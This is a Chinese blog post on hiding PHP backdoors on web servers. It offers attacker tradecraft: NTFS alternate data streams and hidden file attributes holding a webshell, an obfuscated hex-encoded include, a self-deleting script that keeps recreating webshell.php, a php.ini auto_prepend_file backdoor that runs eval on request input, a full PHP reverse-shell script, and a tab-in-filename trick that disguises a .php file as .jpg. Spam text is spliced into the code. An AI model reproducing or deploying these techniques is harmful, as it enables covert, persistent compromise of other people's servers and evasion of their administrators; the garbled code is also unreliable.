php后门隐藏技巧有哪些

这篇文章主要介绍了php后门隐藏技巧有哪些，具有一定借鉴价值，感兴趣的朋友可以参考下，希望大家阅读完这篇文章之后大有收获，下面让小编带着大家一起了解一下。创建系统隐藏文件：attrib +s +a +r +hattrib +s +h 文件名在 Windows 10下即使开启了显示隐藏的项目，或dir仍然看不见。NTFS交换数据流（Alternate　Data　Streams，简称 ADS）是 NTFS 磁盘格式的一个特性，在 NTFS文件系统下，每个文件都可以存在多个数据流。通俗的理解，就是其它文件可以“寄宿”在某个文件身上，而在资源管理器中却只能看到宿主文件，找不到寄宿文件。利用ADS 数据流，我们可以做很多有趣的事情。(抄的)首先创建 ADS 隐藏文件在命令行，echo 一个数据流进去，比如 index 文件是正常文件。echo ^ > index.php:shell.jpg这样就生成了一个不可见的 index.php:shell.jpg使用dir /r查看可使用命令直接修改，要删除的话 直接删除 index.php就ok了第二步，直接使用正常文件包含。做一些免杀
把 index.php:shell.jpg hex 编码

$a=”696E6465782E7068703A7368656C6C2E6A7067″;// index.php:shell.jpg hex编码$b=”a”;include(PACK(‘H*’,$$b))?>在c盘创建这个目录丢个图片一句话然后文件包含，就好。为了隐蔽可以包含图片马，txt等。运行后，会删除自身，生成一个 webshell.php，管理员删除后还会生成。

set_time_limit(0);ignore_user_abort(1);unlink(__FILE__);while(1){file_put_contents(‘webshell.php’,’‘);sleep(5);}解决覆盖重写或者重启 web 服务删掉即可。

set_time_limit(0);ignore_user_abort(1);unlink(__FILE__);while(1){file_put_contents(‘webshell.php’,’clear’);sleep(1);}将下面后门写入php.iniallow_url_include=Onauto_prepend_file=”data:;base64,PD9waHAgQGV2YWwoJF9SRVFVRVNUW2NtZF0pOz8+”// base64 // 后门类型可自己修改。这些做好后，重启 web 服务就好了。方法1. 如果权限很大的话，自己手动重启，缺点容易暴露，重启服务，就要上服务器，某里的服务器，异地登陆有短信提醒。方法2.就是加载一个 php_socke.php 脚本，让他重新加载 php.ini此后门，任何php都可菜刀连接

/******************************//* 只适用于windows系统 *//******************************/while(true){//别问我为什么要死循环，我也不清楚，只有设置成死循环才能加载新的 php.ini …@set_time_limit(0);$system=strtoupper(substr(PHP_OS,0,3));if(!extension_loaded(‘sockets’)){if($system==’WIN’){@dl(‘php_sockets.dll’)ordie(“Can’t load socket”);}}$host=’255.255.255.255′;// 搞一个不存在的ip，万一给人家反弹过去了岂不是真尴尬了~~~$port=1998;//别问我为什么是1998，问了我也不会告诉你….if($system==”WIN”){$env=array(‘path’=>’c:windowssystem32′);}$descriptorspec=array(0=>array(“pipe”,”r”),1=>array(“pipe”,”w”),2=>array(“pipe”,”w”),);$host=gethostbyname($host);$proto=getprotobyname(“tcp”);if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))
if(($ret=@socket_connect($sock,$host,$port))
else{$message=”PHP反弹连接n”;@socket_write($sock,$message,strlen($message));$cwd=str_replace(”,’/’,dirname(__FILE__));while($cmd=@socket_read($sock,65535,$proto)){if(trim(strtolower($cmd))==”exit”){socket_write($sock,”Byen”);exit;}else{$process=proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);if(is_resource($process)){fwrite($pipes[0],$cmd);fclo免费云主机域名se($pipes[0]);$msg=stream_get_contents($pipes[1]);socket_write($sock,$msg,strlen($msg));fclose($pipes[1]);$msg=stream_get_contents($pipes[2]);socket_write($sock,$msg,strlen($msg));$return_value=proc_close($process);}}}}}?>//此脚本非百分百成功比如一句话：@eval($_POST[‘x’]);我们可以写成$a=$_POST[‘x’];@eval($a);我们可以将 $a=$_POST[‘x’];写入一个文件 POST.php然后在 @eval($a); 一句话的上方使用 include “POST.php”；的方式引用！当我们发现源码有个地方执行了数据库操作，那我们就可以改源码和数据库啦~比如，修改成 eval(查出的数据);无意中发现的。具体看代码。

$webpath = dirname(__FILE__).”/”;file_put_contents($webpath .”guige.jpg”.chr(9).”.php”,”保存的内容(比如写个一句话)”);?>生成一个文件。在目录下看到是显示 名字为 guige.jpg但是 web 浏览 却发现 没有找到 guige.jpg 后来发现 需要添 guige.jpg%09.php 这样的话就导致我们可以对后门隐藏了。。管理员看到的是.jpg 我们却可以 web 用.php 解析来连接。。。有用的到的可以看看。感谢你能够认真阅读完这篇文章，希望小编分享的“php后门隐藏技巧有哪些”这篇文章对大家有帮助，同时也希望大家多多支持云编程开发博客，关注云编程开发博客行业资讯频道，更多相关知识等着你来学习!

相关推荐: 神奇的 SNMP

SNMP以GET-SET方式替代了复杂的命令集，可以利用基本操作免费云主机域名完成全部操作，同时，用户可以采用管理信息库标准或按标准的方式来定义自己的MIB。这样就可以通过降低网管系统中众多代理部件的成本来降低整个网管系统的成本。相关推荐: zabbixAPI…